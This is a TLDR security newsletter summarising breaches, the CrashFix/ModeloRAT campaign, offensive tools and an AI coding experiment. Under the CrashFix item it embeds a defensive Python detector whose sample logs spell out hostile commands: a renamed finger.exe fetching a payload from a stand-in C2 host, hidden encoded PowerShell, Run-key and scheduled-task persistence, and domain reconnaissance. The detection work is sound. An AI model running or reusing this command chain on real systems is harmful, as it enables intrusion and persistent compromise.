
Flickr Breach 📸, Preventing AI IDE Malware 🤖, Norway Salt Typhoon Breach 🌪️



TLDR Information Security 2026-02-09

TLDR is hiring a Curator for TLDR IT! (TLDR Curator, ~5 hrs/week)

We are launching a brand new newsletter covering IT and enterprise tech.

If you are an IT leader interested in writing for us, please send your resume or LinkedIn to itcurator@tldr.tech!

🔓 Attacks & Vulnerabilities

Flickr emails users about data breach, pins it on 3rd party (1 minute read)

Flickr disclosed a data breach stemming from a compromised third-party email service provider, with attackers potentially accessing names, email addresses, usernames, IP addresses, general locations, and platform activity. The company shut down access to the affected system within hours and notified data protection authorities in both Europe and the US. No passwords or financial data were reportedly exposed, though Flickr has urged users to watch for phishing attempts and review account settings.

New ClickFix variant 'CrashFix' deploying Python Remote Access Trojan (9 minute read)

Microsoft identified a new ClickFix variant dubbed "CrashFix" that uses a malicious Chrome extension impersonating uBlock Origin Lite to deliberately crash victims' browsers, then tricks users into executing clipboard-copied commands via a fake security warning. The attack chain abuses the legitimate Windows utility finger.exe (renamed to ct.exe) to retrieve obfuscated PowerShell payloads, ultimately deploying a Python-based RAT called ModeloRAT that selectively targets domain-joined enterprise systems for further compromise. ModeloRAT beacons to hardcoded C2 servers over HTTP, establishes persistence via registry Run keys and scheduled tasks, and conducts network reconnaissance using native Windows commands like nltest and net use.
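The chain summarised above has several stages that each leave process-creation telemetry: a renamed finger.exe, hidden encoded PowerShell, a Run-key write, a scheduled task, and nltest / net reconnaissance. The following is an added example (not code from Microsoft's write-up or from this newsletter) that runs one rule per stage over constructed process-creation records and flags a host only when several stages line up, since any single stage on its own is routine admin noise. The pipe-separated log format, host names, paths and command lines are all constructed assumptions; the one real detail the renamed-binary rule relies on is that a PE's OriginalFileName version-resource field survives renaming the file on disk, which is why endpoint sensors record it alongside the on-disk image path.

```python
"""Per-host correlation of the CrashFix / ModeloRAT stages over constructed
process-creation records (added example; formats and values are assumed)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry in an assumed pipe-separated format. Fields:
# timestamp | host | parent image | image path | PE OriginalFileName | command line
SAMPLE_LOGS = """\
2026-02-09T10:01:02Z | ws-17 | cmd.exe | C:\\Users\\u\\AppData\\Local\\Temp\\ct.exe | finger.exe | ct.exe user@c2.invalid
2026-02-09T10:01:05Z | ws-17 | cmd.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | PowerShell.EXE | powershell -nop -w hidden -enc SQBFAFgAIAAoAE4A
2026-02-09T10:01:09Z | ws-17 | powershell.exe | C:\\Windows\\System32\\reg.exe | reg.exe | reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\Users\\u\\py\\run.exe
2026-02-09T10:01:12Z | ws-17 | powershell.exe | C:\\Windows\\System32\\schtasks.exe | schtasks.exe | schtasks /create /tn Updater /tr C:\\Users\\u\\py\\run.exe /sc onlogon
2026-02-09T10:02:30Z | ws-17 | run.exe | C:\\Windows\\System32\\nltest.exe | nltest.exe | nltest /dclist:corp
2026-02-09T10:02:31Z | ws-17 | run.exe | C:\\Windows\\System32\\net.exe | net.exe | net use
2026-02-09T11:00:00Z | ws-22 | explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | PowerShell.EXE | powershell Get-ChildItem
2026-02-09T11:05:00Z | ws-22 | explorer.exe | C:\\Windows\\System32\\net.exe | net.exe | net use
"""


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    original_name: str
    cmdline: str


def parse_events(text):
    """Parse the constructed log format; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split(" | ", 5)]
        if len(parts) != 6:
            continue
        events.append(ProcEvent(*parts))
    return events


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
HIDDEN_PS = re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.IGNORECASE)


def classify(ev):
    """Return the set of chain stages an event matches (empty if benign)."""
    hits = set()
    img = basename(ev.image)
    orig = ev.original_name.lower()
    cmd = ev.cmdline
    # Stage 1: finger.exe running under another file name. Renaming changes the
    # on-disk name but not the OriginalFileName baked into the PE.
    if orig == "finger.exe" and img != "finger.exe":
        hits.add("renamed_finger")
    # Stage 2: hidden-window PowerShell carrying an encoded command.
    if img == "powershell.exe" and ENCODED_PS.search(cmd) and HIDDEN_PS.search(cmd):
        hits.add("hidden_encoded_powershell")
    # Stage 3: persistence through a ...\CurrentVersion\Run value written by reg.exe.
    if img == "reg.exe" and re.match(r"reg\s+add\b", cmd, re.I) and RUN_KEY.search(cmd):
        hits.add("run_key_persistence")
    # Stage 4: persistence through a newly created scheduled task.
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        hits.add("scheduled_task_persistence")
    # Stage 5: domain reconnaissance with native tooling.
    if img == "nltest.exe" or (img == "net.exe" and re.match(r"net\s+(use|group|view)\b", cmd, re.I)):
        hits.add("domain_recon")
    return hits


def correlate(events, min_rules=3):
    """Flag hosts on which at least `min_rules` distinct stages were observed.
    One stage alone (an admin typing `net use`) is noise; several together
    reproduce the chain. A production version would also bound the time window."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev.host] |= classify(ev)
    return {host: sorted(rules) for host, rules in per_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    for host, rules in correlate(parse_events(SAMPLE_LOGS)).items():
        print(host, rules)
```

The threshold of three stages is a tuning choice: `renamed_finger` alone is rare enough to alert on by itself in most fleets, whereas the reconnaissance and PowerShell rules only become interesting in combination.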

Payments Platform BridgePay Confirms Ransomware Attack Behind Outage (2 minute read)

BridgePay Networks Solutions has confirmed that an ongoing outage in its payment gateway and other services is caused by a ransomware attack. The company has stated that it is confident that payment details and credit card information have not been compromised. BridgePay has not responded to questions about which ransomware gang is behind the attack.

🧠 Strategies & Tactics

Deobfuscation and Analysis of Ring-1.io (19 minute read)

Researchers reverse-engineered ring-1.io, a prominent game cheat provider, revealing a sophisticated attack chain that replaces EFI boot binaries, injects into Hyper-V via VMEXIT hooks, and uses EPT-based memory redirection to hide malicious code from kernel-level anti-cheat systems. The implant operates across three privilege boundaries — guest user mode, guest kernel mode, and VMX root — using cloned page tables, CR3 spoofing, and shadow pages filled with 0xCE bytes to evade detection. The analysis also outlines multiple detection strategies, including shadow PML4E scanning, Intel Processor Trace analysis, and RWX anomaly detection under HVCI, emphasizing that Secure Boot enforcement would prevent the entire attack chain.

How We Prevented Cursor, Windsurf, & Google Antigravity from Recommending Malware (6 minute read)

Researchers discovered that AI IDEs forked from VSCode, including Cursor, Windsurf, and Google Antigravity, inherited hardcoded extension recommendation lists pointing to Microsoft marketplace namespaces that were unclaimed on OpenVSX, the open-source alternative these IDEs actually use. An attacker could have registered these unclaimed namespaces and uploaded malicious extensions that the IDEs would proactively recommend to millions of developers based on file types or installed software. The researchers preemptively claimed the vulnerable namespaces and coordinated with the Eclipse Foundation and vendors to remediate, noting that over 1,000 developers installed their inert placeholder extensions simply because their IDE recommended them.

Goodbye to Static Credentials: Embrace Modern Identity Practices (6 minute read)

Static credentials are prone to leakage, can cause significant damage, and can be difficult to rotate. To prevent this, many organizations adopted interim secrets management solutions, such as AWS Secrets Manager and HashiCorp Vault. In the long term, organizations should shift to modern, short-lived credentials, such as managed identities (e.g., AWS roles), federated identities, and application-specific methods for Kubernetes and AI agents.

🧑‍💻 Launches & Tools

Password manager showdown: G2 compared 14 solutions. One dominated the competition (Sponsor)

When G2 analyzed 14 enterprise password managers, the results weren't even close. Bitwarden scored 98/100 on user satisfaction, way above Keeper (92), 1Password (66), and LastPass (58). Bitwarden also had 29% faster ROI, with 83% of Bitwarden customers live in <30 days. See the full breakdown

Hermes (GitHub Repo) (1 minute read)

Hermes is a Linux-only Mythic C2 agent written in Python, featuring 18 built-in commands for reconnaissance, file operations, and shell execution. The agent communicates via HTTP, using Mythic's EKE + AES encryption, and can be deployed as a Python script or a PyInstaller binary. It supports core post-exploitation tasks, including process listing, network enumeration, file transfer, and directory manipulation on Linux targets.

SharePointDumper (GitHub Repo)

SharePointDumper is a PowerShell-based extraction and auditing utility that enumerates SharePoint sites a user has access to via Microsoft Graph and downloads files via SharePoint.

Clawdstrike (GitHub Repo)

Clawdstrike provides runtime security enforcement for agents. It is designed for developers building EDRs and security solutions on top of OpenClaw.

🎁 Miscellaneous

'Encrypt It Already' Campaign Pushes Big Tech to Prioritize E2E Encryption (6 minute read)

The Electronic Frontier Foundation launched its "Encrypt It Already" campaign, urging major tech companies such as Bluesky, Google, and Ring to fulfill their promises to implement end-to-end encryption by default across their platforms. The initiative highlights that many companies either offer E2EE as an opt-in feature or have delayed rolling it out entirely, leaving users exposed, particularly as AI agents increasingly access sensitive communications with less human oversight. EFF noted that several targeted companies are "highly likely" to enable these features within the year, but stressed that default-on encryption remains critical since most users never change default settings.

A LinkedIn Job Offer Tried to Install Malware on My Machine (10 minute read)

The author received a LinkedIn post about a freelance opportunity to evaluate the codebase of a real estate tech platform, complete with a legitimate-looking product and a generous budget. The author accepted the offer and was given access to the codebase, but overlooked red flags such as a missed call with their "Tech Manager", a suspicious git history, and suspicious indicators in the contact's LinkedIn profile. Upon reviewing the repository, the author found an npm post-install script that would download a C2 backdoor, exfiltrate sensitive files, and capture keystrokes.

Sixteen Claude AI agents working together created a new C compiler (5 minute read)

Anthropic researcher Nicholas Carlini used 16 parallel Claude Opus 4.6 agents coordinating via a shared Git repository to produce a 100,000-line Rust-based C compiler capable of compiling a bootable Linux kernel across x86, ARM, and RISC-V architectures. The two-week, $20,000 experiment achieved a 99% pass rate on the GCC torture test suite but hit a practical ceiling around 100,000 lines where new fixes frequently broke existing functionality, suggesting current limits for autonomous agentic coding. The researcher noted significant human scaffolding was required — including custom test harnesses, context-aware output filtering, and time-boxing — raising concerns about developers deploying AI-generated software they have never personally verified.

Quick Links

Can a mainframe mockumentary be funny? Apparently, yes (Sponsor)

Part office comedy, part myth-busting: Big Iron Bits follows a CIO convinced mainframes are dead and the engineers who keep proving him wrong. 12 short episodes from Broadcom. Start watching →

Apple is working to make CarPlay compatible with AI chatbots like ChatGPT (1 minute read)

Apple is reportedly developing support for AI chatbot apps like ChatGPT, Gemini, and Claude within CarPlay, potentially allowing drivers to interact with third-party AI assistants alongside Siri.

Malicious packages for dYdX cryptocurrency exchange empties user wallets (4 minute read)

Malicious npm and PyPI packages published through compromised official dYdX accounts exfiltrated wallet seed phrases and deployed a RAT backdoor, marking the third supply chain attack targeting the decentralized exchange.

Norwegian intelligence discloses country hit by Salt Typhoon campaign (4 minute read)

Norway's domestic security agency confirmed that Chinese state-sponsored group Salt Typhoon compromised network devices in Norwegian organizations.

Love TLDR? Tell your friends and get rewards!

Share your referral link below with friends to get free TLDR swag!
Track your referrals here.

Want to advertise in TLDR? 📰

If your company is interested in reaching an audience of cybersecurity professionals and decision makers, you may want to advertise with us.

Want to work at TLDR? 💼

Apply here, create your own role or send a friend's resume to jobs@tldr.tech and get $1k if we hire them! TLDR is one of Inc.'s Best Bootstrapped businesses of 2025.

If you have any comments or feedback, just respond to this email!

Thanks for reading,
Prasanna Gautam, Eric Fernandez & Sammy Tbeile


Manage your subscriptions to our other newsletters on tech, startups, and programming. Or if TLDR Information Security isn't for you, please unsubscribe.
